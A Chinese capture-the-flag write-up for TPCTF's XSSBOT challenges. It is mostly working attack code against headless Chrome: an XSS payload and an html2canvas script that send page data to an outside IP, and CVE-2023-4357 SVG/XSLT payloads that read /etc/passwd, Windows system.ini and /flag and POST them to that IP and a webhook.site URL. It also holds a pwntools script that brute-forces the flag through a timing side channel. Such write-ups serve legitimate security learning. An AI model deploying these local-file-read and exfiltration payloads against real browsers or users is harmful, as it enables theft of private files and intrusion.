xctf-TPCTF wp
还得是xctf,现在xctf的web题都没web界面了屌
XSSBOT
想法很简单,直接读文件然后外带
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///flag></iframe>')"/>
<script>var xmlhttp1=new XMLHttpRequest();
xmlhttp1.open("GET","http://localhost:5000/a.html",false);
xmlhttp1.send();
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","http://8.129.42.140:3307/"+ btoa(xmlhttp1.responseText),true);
xmlhttp.send();</script>发现这个是可以外带东西的,但是flag也不在cookie,而且要考虑同源策略
然后纠结很久
2021年有人提出过这个观点,https://security.stackexchange.com/questions/242718/how-can-i-read-local-files-from-blind-xss
或许本身就是无解
尝试屏幕截图
学到了屏幕截图的操作
<html>
<head>
<title>Attack</title>
</head>
<body>
<iframe src=file:///flag></iframe>
<script src="https://html2canvas.hertzen.com/dist/html2canvas.min.js"></script>
<script>console.log('Sleeping to allow resources loading!');setTimeout(function () {setInterval(function () {html2canvas(document.getElementsByTagName("html")[0], {scale: 1}).then(canvas => {function b() {eval(this.responseText)};
a = new XMLHttpRequest();a.addEventListener("load", b);
a.open("POST", "http://8.129.42.140:3307/");a.send(btoa(canvas.toDataURL()));}).catch(e => console.log(e));}, 1000);}, 3000);</script>
</html>
EOF玛德不行。没有含flag的截图,而且题目也没有发送我截图
应该是同源策略的问题,所以我不能用file协议
应该是日谷歌浏览器了,当时想了一堆方法
最终找到
CVE-2023-4357+csp bypass 建议参考余总的https://johnfrod.top/安全/csp策略与绕过/
a.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///etc/passwd">
<!ENTITY passwd_c SYSTEM "file:///etc/passwd">
<!ENTITY sysini_p "file:///c:/windows/system.ini">
<!ENTITY sysini_c SYSTEM "file:///c:/windows/system.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&sysini_p;">&sysini_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const localFilePath = p.className;
const localFileContent = p.innerHTML;
// 构建要发送的数据对象
const data = {
filePath: localFilePath,
fileContent: localFileContent
};
// 发送POST请求
fetch('http://8.129.42.140:3307/post.php?'+JSON.stringify(data), {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => response.json())
.then(data => {
// 处理服务器响应,如果有需要的话
console.log('Server response:', data);
})
.catch(error => {
// 处理错误
console.error('Error:', error);
});
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOF这份本地能出,分享会也复现给新生看了
更新了亿点东西
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///etc/passwd">
<!ENTITY passwd_c SYSTEM "file:///etc/passwd">
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&flag_p;">&flag_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const localFilePath = p.className;
const localFileContent = p.innerHTML;
// 构建要发送的数据对象
const data = {
filePath: localFilePath,
fileContent: localFileContent
};
// 发送POST请求
fetch('https://webhook.site/2e14ec61-b946-4b43-9094-bdbee8ac9958?'+JSON.stringify(data), {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => response.json())
.then(data => {
// 处理服务器响应,如果有需要的话
console.log('Server response:', data);
})
.catch(error => {
// 处理错误
console.error('Error:', error);
});
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOF
主要就是魔改了一下,把实体标签换成正常标签,不然总是不解析(但是特么的windows可以)
xssbot2
这个可以打爆:https://www.exploit-db.com/exploits/49915 但是需要交互
所以咱还是先试试时间盲注
用
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///flag">
<!ENTITY passwd_c SYSTEM "file:///flag">
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&flag_p;">&flag_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const localFilePath = p.className;
const localFileContent = p.innerHTML;
// 构建要发送的数据对象
const data = {
filePath: localFilePath,
fileContent: localFileContent
};
// 发送POST请求
fetch('http://8.129.42.140:3307?flag='+p.innerHTML, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => response.json())
.then(data => {
// 处理服务器响应,如果有需要的话
console.log('Server response:', data);
})
.catch(error => {
// 处理错误
console.error('Error:', error);
});
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOF改为匹配
a.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///flag">
<!ENTITY passwd_c SYSTEM "file:///flag">
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&flag_p;">&flag_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const flag = p.innerHTML;
// matchFlagCharacter(i,guessedCharacter)
// 实现一个匹配
index=i_thai;
guessedCharacter='gi_thai';
// 获取 flag 的第i个字符
const correctCharacter = flag.charAt(index);
// 判断当前字符是否匹配
if (guessedCharacter === correctCharacter) {
console.log(`Matched character at index ${index}: ${correctCharacter}`);
// 在匹配时延迟 5 秒
setTimeout(() => {
console.log("Delay finished");
}, 3000);
} else {
console.log(`Incorrect character at index ${index}`);
}
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOFattack.py
from pwn import *
import time
context.log_level = 'WARNING'
flag_thai = ''
# 可见字符列表
char_list = ['T','0', '1', 'P', 'C','F', '4', '5', '6', '7', '8', '9',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j',
'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', '3', 'D',
'E', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',
'O', '2', 'Q', 'R', 'S', 'U', 'V', 'W', 'X',
'Y', 'Z', '!', '@', '#', '$', '%', '^', '&', '*',
'(', ')', '_', '+', '-', '=', '{', '}', '[', ']',
'|', ':', ';', '"', "'", '<', '>', ',', '.', '?',
'/', '`', '~', ' ']
def measure(content) -> int:
try:
# 没网23379 13379
r = remote("202.112.238.82", 23379)
# 有网
# r = remote("202.112.238.82", 23378)
# 接收服务器的初始输出
r.sendlineafter(b"File name: ", b"b.svg")
r.sendlineafter(b"Input your file:", content.encode('utf-8'))
# 测量时间
r.sendline(b'EOF')
r.recvuntil(b'website...')
start = time.time()
print(r.recvuntil(b'Bye bye!').decode('utf-8'))
r.close()
end = time.time()
return end - start
except:
return measure(content)
for i in range(0,40):
# flag的位数
for char_i in char_list:
# char_i='1'
with open('b.svg', 'r',encoding="utf-8") as file:
file_content = file.read()
modified_content = file_content.replace("ii_thai", str(i))
modified_content = modified_content.replace("gi_thai", char_i)
time_cost = measure(modified_content)
print(f"i={i}, char_i={char_i}, time_cost={time_cost}")
if time_cost > 4.5:
print("[*]find")
print(f"i={i}, char_i={char_i}, time_cost={time_cost}")
flag_thai = flag_thai + char_i
print("[*]flag: " + flag_thai)
break接着改良 b.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///flag">
<!ENTITY passwd_c SYSTEM "file:///flag">
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&flag_p;">&flag_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const localFilePath = p.className;
const localFileContent = p.innerHTML;
// 构建要发送的数据对象
const data = {
filePath: localFilePath,
fileContent: localFileContent
};
var index=ii_thai;
var guessedCharacter='gi_thai';
const flag = p.innerHTML;
const correctCharacter = flag.charAt(index);
// 判断当前字符是否匹配
if (guessedCharacter === correctCharacter) {
console.log(`Matched character at index ${index}: ${correctCharacter}`);
setTimeout(() => {
console.log('help');
}, 20000);
fetch('http://8.129.42.140:3307?flag6666='+p.innerHTML, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
} else {
console.log(`Incorrect character at index ${index}`);
// 在匹配时延迟 5 秒
}
// 发送POST请求
fetch('http://8.129.42.140:3307?flag='+p.innerHTML, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
.then(response => response.json())
.then(data => {
// 处理服务器响应,如果有需要的话
console.log('Server response:', data);
})
.catch(error => {
// 处理错误
console.error('Error:', error);
});
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOF这里如果匹配成功,服务器会收到thai666的请求,换成一个可以让浏览器延迟的操作即可
这两个是崩溃:
https://huntr.com/bounties/e268cd68-4f34-49bd-878b-82b96dcc0c99/
1297498 - UAF in ThreatDetailsCacheCollector::OpenEntry - chromium
借鉴了上面崩溃的思路,自己写了一个崩溃
最终脚本
from pwn import *
import time
context.log_level = 'WARNING'
flag_thai = ''
# 可见字符列表
char_list = ['T','0', '1', 'P', 'C','F', '4', '5', '6', '7', '8', '9',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j',
'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',
'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', '3', 'D',
'E', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',
'O', '2', 'Q', 'R', 'S', 'U', 'V', 'W', 'X',
'Y', 'Z', '!', '@', '#', '$', '%', '^', '&', '*',
'(', ')', '_', '+', '-', '=', '{', '}', '[', ']',
'|', ':', ';', '"', "'", '<', '>', ',', '.', '?',
'/', '`', '~', ' ']
def measure(content) -> int:
try:
# 没网23379 13379
r = remote("202.112.238.82", 23379)
# 有网
# r = remote("202.112.238.82", 23378)
# 接收服务器的初始输出
r.sendlineafter(b"File name: ", b"b.svg")
r.sendlineafter(b"Input your file:", content.encode('utf-8'))
# 测量时间
r.sendline(b'EOF')
r.recvuntil(b'website...')
start = time.time()
print(r.recvuntil(b'Bye bye!').decode('utf-8'))
r.close()
end = time.time()
return end - start
except:
return measure(content)
for i in range(0,40):
# flag的位数
for char_i in char_list:
# char_i='1'
with open('b.svg', 'r',encoding="utf-8") as file:
file_content = file.read()
modified_content = file_content.replace("ii_thai", str(i))
modified_content = modified_content.replace("gi_thai", char_i)
time_cost = measure(modified_content)
print(f"i={i}, char_i={char_i}, time_cost={time_cost}")
if time_cost > 4.5:
print("[*]find")
print(f"i={i}, char_i={char_i}, time_cost={time_cost}")
flag_thai = flag_thai + char_i
print("[*]flag: " + flag_thai)
breakb.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY flag_p "file:///flag">
<!ENTITY flag_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&flag_p;">&flag_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
});
document.querySelectorAll('p').forEach(p => {
const localFilePath = p.className;
const localFileContent = p.innerHTML;
// 构建要发送的数据对象
const data = {
filePath: localFilePath,
fileContent: localFileContent
};
var index=ii_thai;
var guessedCharacter='gi_thai';
const flag = p.innerHTML;
const correctCharacter = flag.charAt(index);
// 判断当前字符是否匹配
if (guessedCharacter === correctCharacter) {
console.log(`Matched character at index ${index}: ${correctCharacter}`);
window.location="/b.svg";
fetch('/b.svg?'+p.innerHTML, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(data),
})
} else {
console.log(`Incorrect character at index ${index}`);
// 在匹配时延迟 5 秒
}
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
EOF
帅!
TPCTF{ea5y5C4}
这个漏洞还是很有意思的,当时学弟用知乎的一个exp试了一下,自己的浏览器可以任意文件读
